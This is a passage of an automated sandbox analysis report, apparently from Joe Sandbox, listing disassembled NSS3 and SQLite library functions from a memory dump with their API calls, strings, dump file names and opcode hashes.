                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorUtil$Alloc_Value$CriticalEnterGenerateItem_K11_RandomSectionUnlockZfreecalloc
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3619055319-0
                                                                                                                                                                                                                                                            • Opcode ID: f23b25f3f6ad3dee2c2ec0fc4be21a59d8eea69007335c1270049e45527e21e3
                                                                                                                                                                                                                                                            • Instruction ID: 67e6438f66b6225c1ad4c48fd83fba42fc788fc2a888cc33437905681ae4d45b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f23b25f3f6ad3dee2c2ec0fc4be21a59d8eea69007335c1270049e45527e21e3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EDF027B3E8431222FA2012F92C03F0775884B51B99F440935FD4DE62F2FAAEB01185B3
                                                                                                                                                                                                                                                            Function 6BE67AF0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 123COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(6BE668C4,?,?,?,?,?,?,?,6BE668C4,?,?,00000000,?,?), ref: 6BE67BAE
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • database corruption, xrefs: 6BE67C1D
                                                                                                                                                                                                                                                            • %s at line %d of [%.10s], xrefs: 6BE67C22
                                                                                                                                                                                                                                                            • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6BE67C13
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: memcpy
                                                                                                                                                                                                                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                            • API String ID: 3510742995-598938438
                                                                                                                                                                                                                                                            • Opcode ID: 7c8975062e46faa15de549b659fee2adae260a2d3f3b6d90fb5d2f065c80934c
                                                                                                                                                                                                                                                            • Instruction ID: 2624082bcf04ad01980e2d2a720a11c330862d1506f144bad262d4fc19b9c3c6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7c8975062e46faa15de549b659fee2adae260a2d3f3b6d90fb5d2f065c80934c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 84418971E402198FCB14CFA8D8819EEBBF2EF48354F214569EC45A7310E338AD51CBA0
                                                                                                                                                                                                                                                            Function 6BE51970 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 116COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,?,00000000,?,6BE660B3), ref: 6BE5199F
                                                                                                                                                                                                                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,6BE660B3), ref: 6BE51AC9
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • database corruption, xrefs: 6BE51ABD
                                                                                                                                                                                                                                                            • %s at line %d of [%.10s], xrefs: 6BE51AC2
                                                                                                                                                                                                                                                            • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6BE51AB3
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: memsetsqlite3_log
                                                                                                                                                                                                                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                            • API String ID: 3107271255-598938438
                                                                                                                                                                                                                                                            • Opcode ID: 04892b8e3ddcdc1360fc0e42bcea86436c225f0ad75aa599dfdcefe7e8dbaf1e
                                                                                                                                                                                                                                                            • Instruction ID: f86148f5c85e77eb0dfe4fb7b54d05733cf341d74d1b1e574ef3c7e3686fa87a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 04892b8e3ddcdc1360fc0e42bcea86436c225f0ad75aa599dfdcefe7e8dbaf1e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4641EF716087818FC320CF69C490797BBF2BF95308F2486ADC4994BB42D376E546CBA1
                                                                                                                                                                                                                                                            Function 6BE4B8B0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 107COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010B2E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,?,?,6BF7A4E2), ref: 6BE4B948
                                                                                                                                                                                                                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010B19,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?), ref: 6BE4B9BE
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: sqlite3_log
                                                                                                                                                                                                                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                            • API String ID: 632333372-598938438
                                                                                                                                                                                                                                                            • Opcode ID: e92b851d0c816e0cab08bd1dffa74824b891a9bfecd3937348a59047bf5355ab
                                                                                                                                                                                                                                                            • Instruction ID: 34bc89e0b66a48baabee70ff6b7f90f14a2a00b3622c7c805cc2cbaf38138ac6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e92b851d0c816e0cab08bd1dffa74824b891a9bfecd3937348a59047bf5355ab
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B41D331B042049FD704DF39D890F6A7BB5AF45308F2544A8EA599F362D73ADD52CB90
                                                                                                                                                                                                                                                            Function 6BED49C0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 6BED4860: SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BED4894
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,6BED6361,?,?,?), ref: 6BED4A8F
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,6BED6361,?,?,?), ref: 6BED4AD0
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Error$DecodeItem_QuickUtil
                                                                                                                                                                                                                                                            • String ID: ^jk$ack$ack
                                                                                                                                                                                                                                                            • API String ID: 1982233058-1575653464
                                                                                                                                                                                                                                                            • Opcode ID: adeb20c1822704741b2672c094bac26798dbae73da59206ca726e5230b437187
                                                                                                                                                                                                                                                            • Instruction ID: 8465700848f508b079d8b7cda3e77d2550d24b7b7018869b84237a9086610618
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: adeb20c1822704741b2672c094bac26798dbae73da59206ca726e5230b437187
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D531EA309041068BEB108B99DC91B6E7375D791718F70493BD5199B3C1E67C9853879A
                                                                                                                                                                                                                                                            Function 6BE4DB40 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 93COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?), ref: 6BE4DBB8
                                                                                                                                                                                                                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011D39,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?), ref: 6BE4DC3D
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • database corruption, xrefs: 6BE4DC32
                                                                                                                                                                                                                                                            • %s at line %d of [%.10s], xrefs: 6BE4DC37
                                                                                                                                                                                                                                                            • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6BE4DC28
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: memcpysqlite3_log
                                                                                                                                                                                                                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                            • API String ID: 3892320796-598938438
                                                                                                                                                                                                                                                            • Opcode ID: 42cd582c0a1143c55ec01b14ea8f86c1a552afce8c194277620d4a61aed04232
                                                                                                                                                                                                                                                            • Instruction ID: f558d4678c7e0a3e40dd132ff60fb199410dc68d620f37f251d644b8aa50ad51
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 42cd582c0a1143c55ec01b14ea8f86c1a552afce8c194277620d4a61aed04232
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6631C9796052549FC321CF28D940A6ABBF0BF49314B14869DE8999B753D239E905CBB0
                                                                                                                                                                                                                                                            Function 6BED4B00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6BED4B66
                                                                                                                                                                                                                                                            • NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6BED4B7D
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE0B5,00000000), ref: 6BED4B97
                                                                                                                                                                                                                                                            • PORT_ZAlloc_Util.NSS3(00000018), ref: 6BED4BB7
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20D30: calloc.MOZGLUE ref: 6BF20D50
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20D30: TlsGetValue.KERNEL32 ref: 6BF20D6D
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AlgorithmPolicy$Alloc_ErrorUtilValuecalloc
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4087055539-3916222277
                                                                                                                                                                                                                                                            • Opcode ID: f108ad1fa6ab95c2a462c422a6eea92ac8d08a1195d5e671e51dada2ed086d61
                                                                                                                                                                                                                                                            • Instruction ID: 36c8214615df314ad3d00298eb0510d84fa0a24c8b1cc1536eee774b301db3a6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f108ad1fa6ab95c2a462c422a6eea92ac8d08a1195d5e671e51dada2ed086d61
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D213B72D0020A5BDF108B78DC42B6FBBB4DF7031CF300366E92596391E7B49526C6A2
                                                                                                                                                                                                                                                            Function 6BF01B10 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(00000000,?,6BED3147,?,?), ref: 6BF01B41
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6BED3147,?,?), ref: 6BF01B51
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6BED3147), ref: 6BF01B7C
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6BF01B94
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                                                                                                                                            • String ID: G1k
                                                                                                                                                                                                                                                            • API String ID: 284873373-4106979879
                                                                                                                                                                                                                                                            • Opcode ID: 6f66da30b660c717d8a535432a25a8ea15fcdeeac9506c62589e3b1e1501f7e5
                                                                                                                                                                                                                                                            • Instruction ID: 2f8af1c32935bb2f39974175c1a68ec8cf5e5296e31bc38d724f22e371659b1a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f66da30b660c717d8a535432a25a8ea15fcdeeac9506c62589e3b1e1501f7e5
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17210AB2D001299BDF00AF78DC55AAEB774FF05318F440165ED0597211EB35DA108BD0
                                                                                                                                                                                                                                                            Function 6BEFCAA0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD,6BEDB1EE,D958E836,?,6BF151C5), ref: 6BEFCAFA
                                                                                                                                                                                                                                                            • PR_UnloadLibrary.NSS3(?,6BF151C5), ref: 6BEFCB09
                                                                                                                                                                                                                                                            • PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD,6BEDB1EE,D958E836,?,6BF151C5), ref: 6BEFCB2C
                                                                                                                                                                                                                                                            • PR_UnloadLibrary.NSS3(6BF151C5), ref: 6BEFCB3E
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: LibrarySecureUnload
                                                                                                                                                                                                                                                            • String ID: NSS_DISABLE_UNLOAD
                                                                                                                                                                                                                                                            • API String ID: 4190191112-1204168554
                                                                                                                                                                                                                                                            • Opcode ID: 594b7dc6cc4ff18deefb6f98514681a0d7ac738c3c3d001e0525423103eb04a5
                                                                                                                                                                                                                                                            • Instruction ID: e2bb2a8c89fbca98b052c5916d76d01740b78f9f79955b2cf52257f4b24bdaf7
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 594b7dc6cc4ff18deefb6f98514681a0d7ac738c3c3d001e0525423103eb04a5
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CA11D6B5B14A119BDB04DFA5D949701B3B8BB01B6CF30456AD40982340DB7CE4B2DBD6
                                                                                                                                                                                                                                                            Function 6BE41A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6BE41A4A
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE897,00000000), ref: 6BE41ABF
                                                                                                                                                                                                                                                              • Part of subcall function 6BF6C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6BF6C2BF
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE89B,00000000), ref: 6BE41AD7
                                                                                                                                                                                                                                                            • PR_LogPrint.NSS3(read -> %d,00000000), ref: 6BE41AEA
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorValue$Print
                                                                                                                                                                                                                                                            • String ID: read -> %d
                                                                                                                                                                                                                                                            • API String ID: 1543141660-3490866108
                                                                                                                                                                                                                                                            • Opcode ID: 34a63a516c730983eab6b85579456b074fe6ab5194ef1869164df6d7c37949cc
                                                                                                                                                                                                                                                            • Instruction ID: 4965d7f83a722ef39035c4c59cfa79a3ef2d7db3a15a451d1ce9ae9c659af976
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 34a63a516c730983eab6b85579456b074fe6ab5194ef1869164df6d7c37949cc
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C112936D0062197DF205AF8EC0276A7FA1DF013D9F244639ED6A52261F73998B4D2C3
                                                                                                                                                                                                                                                            Function 6BEB79B0 Relevance: 7.9, APIs: 5, Instructions: 427COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • sqlite3_value_text.NSS3(?), ref: 6BEB79DA
                                                                                                                                                                                                                                                            • sqlite3_value_text.NSS3(?), ref: 6BEB79E9
                                                                                                                                                                                                                                                            • sqlite3_value_text.NSS3(?), ref: 6BEB79F6
                                                                                                                                                                                                                                                            • sqlite3_value_text.NSS3(?), ref: 6BEB7A05
                                                                                                                                                                                                                                                            • sqlite3_result_error_code.NSS3(?,00000000), ref: 6BEB7E05
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: sqlite3_value_text$sqlite3_result_error_code
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1222672844-0
